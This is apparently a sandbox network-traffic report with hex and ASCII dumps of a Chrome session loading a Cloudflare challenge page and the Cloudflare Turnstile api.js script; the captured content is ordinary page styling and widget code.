                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                referrer-policy: same-origin
                                                                                                document-policy: js-profiling
                                                                                                2025-01-08 13:48:13 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 63 61 34 64 38 66 63 66 35 63 33 33 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8feca4d8fcf5c334-EWRalt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:13 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.549733104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:13 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:13 UTC471INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:13 GMT
                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                Content-Length: 47521
                                                                                                Connection: close
                                                                                                accept-ranges: bytes
                                                                                                last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                access-control-allow-origin: *
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4d92bed0f9b-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:13 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                2025-01-08 13:48:13 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
